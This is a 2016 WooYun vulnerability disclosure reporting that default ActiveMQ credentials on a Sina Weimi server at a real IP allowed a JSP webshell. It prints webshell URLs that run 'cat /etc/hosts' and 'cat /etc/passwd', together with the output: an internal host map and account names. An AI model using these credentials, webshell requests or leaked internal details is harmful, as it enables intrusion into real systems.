破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

新浪微米某系统弱口令getshell/root权限/内网环境

编号224381
Urlhttp://www.wooyun.org/bug.php?action=view&id=224381
漏洞状态漏洞已经通知厂商但是厂商忽略漏洞
漏洞标题新浪微米某系统弱口令getshell/root权限/内网环境
漏洞类型命令执行
厂商新浪
白帽子路人甲
提交日期2016-06-29 13:58:00
公开日期2016-07-04 10:30:00
修复时间(not set)
确认时间0000-00-00 00:00:00
Confirm Spend-1
漏洞标签远程命令执行
关注数0
收藏数0
白帽评级
白帽自评rank12
厂商评级
厂商评rank0
漏洞简介
rt
漏洞细节

看到都提给sina了 于是我也跟着众神们的节奏来一发

111.png


http://183.136.160.234:8161/
ActionMQ 弱口令 admin admin

111.png


http://183.136.160.234:8161/admin/test/sex.jsp
http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/hosts
应该是直入内网了。。

# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost
::1 localhost6.localdomain6 localhost6
202.106.184.152 interface.blog.sina.com.cn
10.0.8.32 datacube_mongo
#shequ
10.221.149.246 shequ.dev.weimi.me
#hdfs
#10.0.8.123 wemeetcluster
10.0.8.103 storage.intra.ilianmeng.com
10.0.8.103 test2.live.intra.ilianmeng.com
10.0.8.32 matrix_registry_1
10.0.8.32 matrix_registry_2
10.0.8.32 matrix_registry_3 mongodb_server
10.0.8.32 matrixmc_1 matrixuuid_1
10.0.8.32 matrixmc_2 matrixuuid_2
10.0.8.32 matrixmc_3 matrixuuid_3
10.0.8.32 matrixmc_4 matrixuuid_4
10.0.8.32 matrixdb m_api_db.intra.ilianmeng.com
10.0.8.32 s_api_db.intra.ilianmeng.com
10.0.8.32 matrixredis_1
10.0.8.32 matrixredis_2
10.0.8.32 matrixredis_3
10.0.8.32 matrixredis_4
10.0.8.103 sentinel_host_1
10.0.8.103 sentinel_host_2
10.0.8.32 sentinel_host_3
10.0.8.32 pushserver push.intra.ilianmeng.com
10.0.8.10 node10.intra.hiwemeet.com
10.0.8.32 node11.intra.hiwemeet.com
10.0.8.103 node103.intra.ilianmeng.com img.intra.ilianmeng.com amq.intra.ilianmeng.com searchService neo4j_server search.intra.ilianmeng.com test2.api.intra.ilianmeng.com test2.img.ilianmeng.com test2.img.intra.ilianmeng.com
10.0.8.13 node13.intra.hiwemeet.com
10.0.8.14 node14.intra.hiwemeet.com
10.0.8.2 node2.intra.hiwemeet.com
10.0.8.3 node3.intra.hiwemeet.com
10.0.8.4 node4.intra.hiwemeet.com
10.0.8.5 node5.intra.hiwemeet.com
10.0.8.6 node6.intra.hiwemeet.com
10.0.8.7 node7.intra.hiwemeet.com
10.0.8.8 node8.intra.hiwemeet.com
10.0.8.9 node9.intra.hiwemeet.com
10.0.8.15 salt yum.intra.hiwemeet.com node15.intra.hiwemeet.com statsdserver repo.hiwemeet.com
10.0.8.43 node43.intra.hiwemeet.com baokumc_1 baokumc_2 baokumc_3 baokumc_4 s_api_db.intra.baoku.com m_api_db.intra.baoku.com
10.0.8.44 node44.intra.hiwemeet.com
10.0.8.45 node45.intra.hiwemeet.com
10.0.8.102 node102.intra.hiwemeet.com sub.intra.hiwemeet.com
10.0.8.103 node103.intra.hiwemeet.com sub.intra.ilianmeng.com
10.0.8.102 couchbase115 couchbase116
10.0.8.103 couchbase117 couchbase118
10.0.8.6 redis1.shihui.com
10.0.8.32 s_shihui_db.intra.ilianmeng.com s_shihui_db.intra.hiwemeet.com
10.0.8.32 m_shihui_db.intra.ilianmeng.com m_shihui_db.intra.hiwemeet.com
10.0.8.235 redis2.shihui.com
10.0.8.235 redis3.shihui.com
10.0.8.235 shihuiredis_1
10.0.8.235 shihuiredis_2
10.0.8.235 shihuiredis_3
10.0.8.235 shihuiredis_4
10.0.8.32 shihuimc_1
10.0.8.32 shihuimc_2
10.0.8.32 shihuimc_3
10.0.8.32 shihuimc_4
10.0.8.103 test2.img.intra.ilianmeng.com
10.0.8.103 test2.scorpio.ilianmeng.com
10.0.8.107 static.17shihui.cn
10.0.8.103 api.ilianmeng.com
10.0.8.103 dev.scorpio.ilianmeng.com
10.0.8.32 test2.search.user.db.host search.user.db.host
10.0.8.43 51baokuredis_1
10.0.8.43 51baokuredis_2
10.0.8.43 51baoku_uuid_1
10.0.8.43 51baoku_uuid_2
10.0.8.43 m_db.intra.51baoku.com
10.0.8.43 s_db.intra.51baoku.com


111.png


111.png


http://183.136.160.234:8161/admin/test/sex.jsp?pwd=023&cmd=cat%20/etc/passwd

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:134:134:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:495:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
luci:x:141:141:luci high availability management application:/var/lib/luci:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:494:488:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
yuanming:x:501:501::/home/yuanming:/bin/bash
haibo:x:502:502::/home/haibo:/bin/bash
gaozhi:x:503:503::/home/gaozhi:/bin/bash
hanjian:x:504:504::/home/hanjian:/bin/bash
liuxin:x:505:505::/home/liuxin:/bin/bash
yiqian:x:506:506::/home/yiqian:/bin/bash
yifeng:x:507:507::/home/yifeng:/bin/bash
www:x:508:508::/home/www:/bin/bash
couchbase:x:493:486:couchbase system user:/opt/couchbase:/bin/sh
nginx:x:492:485:Nginx web server:/var/lib/nginx:/sbin/nologin
td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin
yongrong:x:509:509::/home/yongrong:/bin/bash
baoku:x:510:10::/home/baoku:/bin/bash
yuwenlong:x:511:511::/home/yuwenlong:/bin/bash
jizheng:x:512:10::/home/jizheng:/bin/bash
zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash


就证明这么多。

POC

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
hacluster:x:499:499:cluster user:/home/hacluster:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin
pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
cimsrvr:x:134:134:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rtkit:x:498:495:RealtimeKit:/proc:/sbin/nologin
avahi-autoipd:x:170:170:Avahi IPv4LL Stack:/var/lib/avahi-autoipd:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
saslauth:x:497:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
gdm:x:42:42::/var/lib/gdm:/sbin/nologin
ricci:x:140:140:ricci daemon user:/var/lib/ricci:/sbin/nologin
tomcat:x:91:91:Apache Tomcat:/usr/share/tomcat6:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dhcpd:x:177:177:DHCP server:/:/sbin/nologin
memcached:x:496:493:Memcached daemon:/var/run/memcached:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pulse:x:495:492:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin
stap-server:x:155:155:Systemtap Compile Server:/var/lib/stap-server:/sbin/nologin
xguest:x:500:500:Guest:/home/xguest:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
quagga:x:92:92:Quagga routing suite:/var/run/quagga:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
arpwatch:x:77:77::/var/lib/arpwatch:/sbin/nologin
luci:x:141:141:luci high availability management application:/var/lib/luci:/sbin/nologin
ident:x:98:98::/:/sbin/nologin
uuidd:x:494:488:UUID generator helper daemon:/var/lib/libuuid:/sbin/nologin
radvd:x:75:75:radvd user:/:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin
yuanming:x:501:501::/home/yuanming:/bin/bash
haibo:x:502:502::/home/haibo:/bin/bash
gaozhi:x:503:503::/home/gaozhi:/bin/bash
hanjian:x:504:504::/home/hanjian:/bin/bash
liuxin:x:505:505::/home/liuxin:/bin/bash
yiqian:x:506:506::/home/yiqian:/bin/bash
yifeng:x:507:507::/home/yifeng:/bin/bash
www:x:508:508::/home/www:/bin/bash
couchbase:x:493:486:couchbase system user:/opt/couchbase:/bin/sh
nginx:x:492:485:Nginx web server:/var/lib/nginx:/sbin/nologin
td-agent:x:491:484:td-agent:/var/lib/td-agent:/sbin/nologin
yongrong:x:509:509::/home/yongrong:/bin/bash
baoku:x:510:10::/home/baoku:/bin/bash
yuwenlong:x:511:511::/home/yuwenlong:/bin/bash
jizheng:x:512:10::/home/jizheng:/bin/bash
zhangjianghao:x:513:513::/home/zhangjianghao:/bin/bash

修复方案

弱口令

状态信息 2016-06-29: 细节已通知厂商并且等待厂商处理中
2016-07-04: 厂商已经主动忽略漏洞,细节向公众公开
厂商回复请直接提交给微米官方联系修复。
回应信息危害等级:无影响厂商忽略忽略时间:2016-07-04 10:30
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

@洋葱 吃掉你

j14n02016-06-30 15:27:00

弱口令……洋葱占个坑

洋葱02016-06-30 15:16:00